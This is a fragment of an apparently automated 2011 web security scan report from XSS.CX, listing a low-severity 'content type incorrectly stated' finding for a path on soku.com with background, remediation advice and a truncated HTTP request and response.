HTTP/1.0 200 OK/title>...[SNIP]... <script type="text/javascript" src="http://lstat.youku.com/urchin.js">  </script>...[SNIP]...   
5. Content type incorrectly stated 
 previous 
Summary 
Severity:   
Information  
Confidence:   
Firm  
Host:   
http://www.soku.com  
Path:   
/img/videowall  
Issue detail 
The response contains the following Content-type statement:Content-Type: text/html; charset=utf-8 HTML . However, it actually appears to contain unrecognised content . 
Issue background 
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities. 
Issue remediation 
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body. 
Request 
GET /img/videowall HTTP/1.1;q=0.3  
Response 
HTTP/1.0 200 OKContent-Type: text/html; charset=utf-8 ..... .........", "pic":"http://g1.ykimg.com/0102641F464CF4C4440000000000000CFB6B92-BB59-DB20-A1BC-03023D40384F"},{"name":"............", "pic":"http://g2.ykimg.com/0102641F46...[SNIP]...         
Report generated by XSS.CX  at Fri Aug 19 11:49:50 GMT-06:00 2011.